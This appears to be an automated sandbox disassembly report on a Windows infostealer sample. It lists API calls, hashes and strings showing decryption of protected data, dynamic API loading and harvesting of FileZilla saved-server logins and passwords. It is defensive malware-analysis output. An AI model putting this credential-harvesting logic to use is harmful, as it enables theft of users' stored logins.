                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                            • String ID:
                                            • API String ID: 3243516280-0
                                            • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                            • Instruction ID: 480ba7e10c67ca4965717be41af3eb5a01fb900c18b0a4777cc214a19d963575
                                            • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                            • Instruction Fuzzy Hash: 7C11FAB8A00209EFDB04DFA4D985AAE77B5FF89704F104558E91597390D730AA10CF61
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                            • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                            • LocalFree.KERNEL32(?), ref: 00409BD3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                            • String ID:
                                            • API String ID: 3243516280-0
                                            • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                            • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                            • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                            • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,007CAAA0,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,007CAAA0,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,007CAAA0,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                            • wsprintfA.USER32 ref: 00417AB7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                            • String ID:
                                            • API String ID: 362916592-0
                                            • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                            • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                            • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                            • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                            APIs
                                            • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID:
                                            • API String ID: 123533781-0
                                            • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                            • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                            • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                            • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .$GetProcAddress.$l
                                            • API String ID: 0-2784972518
                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction ID: bfadb0061051b38229bf879b988c87c71fac3a0d00a5596b668d228a20db719b
                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction Fuzzy Hash: E7314BB6900619DFDB14CF99C880AAEBBF9FF58324F14404AD442B7351D7B1EA49CBA4
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 023EF985
                                            • StrCmpCA.SHLWAPI(?,004215BC), ref: 023EF9D6
                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 023EF9EC
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023EFD18
                                            • FindClose.KERNEL32(000000FF), ref: 023EFD2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                            • Instruction ID: ca7575b53b391e1ec510e5940bf324a5784197d0df93060e12562f1e64a75dfc
                                            • Opcode Fuzzy Hash: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                            • Instruction Fuzzy Hash: A6117F7180025CABCF78EBA0ED649ED7376AF11300F4046AAA61E56591EF302B4DCF41
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 023FD156
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                            • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                            • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                            • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                            • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                            • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                            • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280904911.000000000079E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0079E000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_79e000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: uy
                                            • API String ID: 0-3485231500
                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction ID: 0eefd086386ab5e3cd796fc364ec115035c91aef8743790e56a7db56d953990f
                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction Fuzzy Hash: AD117C72340200AFDB54DF55EC85EA673EAFB89320B298065ED04CB322E679EC41C760
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction ID: ac9752dd3aafc6769321994f63d844d3766f3232f805cbc691490aa8220b8af2
                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction Fuzzy Hash: BA01DF72A10A108FDF25DF20C904BAF33A5EBC6306F0540B5D90BE7281E3B0A8498B80
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                            • Instruction ID: 54d1e10b2dd0648dee1cb2d9f113b9c83761a0e98ec308d8ba8eafc5e5a04630
                                            • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                            • Instruction Fuzzy Hash: EB71C132451B40EBD7F33B31FD11E4AFAA37F04702F104926BADF295709E226865AE51
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                            • strtok_s.MSVCRT ref: 0041031B
                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                            • lstrlenA.KERNEL32(00000000), ref: 00410393
                                              • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                              • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                            • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                            • lstrlenA.KERNEL32(00000000), ref: 00410427
                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                            • lstrlenA.KERNEL32(00000000), ref: 00410475
                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                            • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                            • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                            • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                            • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                            • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                            • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                            • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                            • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                            • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                            • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                            • strtok_s.MSVCRT ref: 00410679
                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                            • memset.MSVCRT ref: 004106DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                            • API String ID: 337689325-514892060
                                            • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                            • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                            • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                            • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                            APIs
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 023F9B08
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 023F9B21
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 023F9B39
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 023F9B51
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 023F9B6A
                                            • GetProcAddress.KERNEL32(0064A8B0,Xry), ref: 023F9B82
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 023F9B9A
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 023F9BB3
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 023F9BCB
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 023F9BE3
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 023F9BFC
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 023F9C14
                                            • GetProcAddress.KERNEL32(0064A8B0,XWy), ref: 023F9C2C
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 023F9C45
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 023F9C5D
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 023F9C75
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 023F9C8E
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 023F9CA6
                                            • GetProcAddress.KERNEL32(0064A8B0,8Xy), ref: 023F9CBE
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 023F9CD7
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 023F9CEF
                                            • LoadLibraryA.KERNEL32(0064A550,?,023F6C67), ref: 023F9D01
                                            • LoadLibraryA.KERNEL32(0064A17C,?,023F6C67), ref: 023F9D12
                                            • LoadLibraryA.KERNEL32(0064A104,?,023F6C67), ref: 023F9D24
                                            • LoadLibraryA.KERNEL32(0064A1DC,?,023F6C67), ref: 023F9D36
                                            • LoadLibraryA.KERNEL32(0064A328,?,023F6C67), ref: 023F9D47
                                            • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 023F9D69
                                            • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 023F9D8A
                                            • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 023F9DA2
                                            • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 023F9DC4
                                            • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 023F9DE5
                                            • GetProcAddress.KERNEL32(0064A7D8,qy), ref: 023F9E06
                                            • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 023F9E1D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: 8Xy$XWy$Xry$qy
                                            • API String ID: 2238633743-785294649
                                            • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                            • Instruction ID: a5c7873a7125081167ff94e6eb303a49fac81e60288e6f048ab7d573373e698c
                                            • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                            • Instruction Fuzzy Hash: 3BA13CBE5C0240BFE364EFE8ED88A963BFBF74E201714661AE605C3264D7399441DB52
                                            APIs
                                            • lstrlen.KERNEL32(00424D98), ref: 023E4833
                                            • lstrlen.KERNEL32(00424E48), ref: 023E483E
                                            • lstrlen.KERNEL32(00424F10), ref: 023E4849
                                            • lstrlen.KERNEL32(00424FC8), ref: 023E4854
                                            • lstrlen.KERNEL32(00425070), ref: 023E485F
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 023E486E
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023E4875
                                            • lstrlen.KERNEL32(00425118), ref: 023E4883
                                            • lstrlen.KERNEL32(004251C0), ref: 023E488E
                                            • lstrlen.KERNEL32(00425268), ref: 023E4899
                                            • lstrlen.KERNEL32(00425310), ref: 023E48A4
                                            • lstrlen.KERNEL32(004253B8), ref: 023E48AF
                                            • lstrlen.KERNEL32(00425460), ref: 023E48C3
                                            • lstrlen.KERNEL32(00425508), ref: 023E48CE
                                            • lstrlen.KERNEL32(004255B0), ref: 023E48D9
                                            • lstrlen.KERNEL32(00425658), ref: 023E48E4
                                            • lstrlen.KERNEL32(00425700), ref: 023E48EF
                                            • lstrlen.KERNEL32(004257A8), ref: 023E4918
                                            • lstrlen.KERNEL32(00425850), ref: 023E4923
                                            • lstrlen.KERNEL32(00425918), ref: 023E492E
                                            • lstrlen.KERNEL32(004259C0), ref: 023E4939
                                            • lstrlen.KERNEL32(00425A68), ref: 023E4944
                                            • strlen.MSVCRT ref: 023E4957
                                            • lstrlen.KERNEL32(00425B10), ref: 023E497F
                                            • lstrlen.KERNEL32(00425BB8), ref: 023E498A
                                            • lstrlen.KERNEL32(00425C60), ref: 023E4995
                                            • lstrlen.KERNEL32(00425D08), ref: 023E49A0
                                            • lstrlen.KERNEL32(00425DB0), ref: 023E49AB
                                            • lstrlen.KERNEL32(00425E58), ref: 023E49BB
                                            • lstrlen.KERNEL32(00425F00), ref: 023E49C6
                                            • lstrlen.KERNEL32(00425FA8), ref: 023E49D1
                                            • lstrlen.KERNEL32(00426050), ref: 023E49DC
                                            • lstrlen.KERNEL32(004260F8), ref: 023E49E7
                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 023E4A03
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                            • String ID:
                                            • API String ID: 2127927946-0
                                            • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                            • Instruction ID: d08faa29961c9c6627824d371129a2c1405ad81fa52a6af724ddd217bd07fbda
                                            • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                            • Instruction Fuzzy Hash: 9941BB79740624EBC718AFE5EC8DB987F71AB4C712BA0C062F9029A190C7F5D5019B3E
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 023F9072
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
